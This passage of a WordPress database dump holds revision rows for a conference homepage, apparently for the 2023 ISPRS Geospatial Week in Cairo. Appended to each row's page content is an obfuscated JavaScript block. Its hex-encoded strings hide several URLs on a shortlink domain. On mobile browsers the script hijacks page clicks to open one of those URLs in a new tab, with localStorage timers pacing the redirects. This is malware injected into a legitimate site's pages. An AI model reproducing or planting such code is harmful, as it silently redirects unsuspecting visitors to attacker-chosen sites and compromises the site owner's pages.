_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 21:53:48','2022-11-08 21:53:48','',3066,'https://gsw2023.com/?p=3084',0,'revision','',0),
(3085,1,'2022-11-08 21:54:30','2022-11-08 21:54:30','[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 21:54:30','2022-11-08 21:54:30','',3066,'https://gsw2023.com/?p=3085',0,'revision','',0),
(3086,1,'2022-11-08 21:57:17','2022-11-08 21:57:17','[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify; color: black;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 21:57:17','2022-11-08 21:57:17','',3066,'https://gsw2023.com/?p=3086',0,'revision','',0),
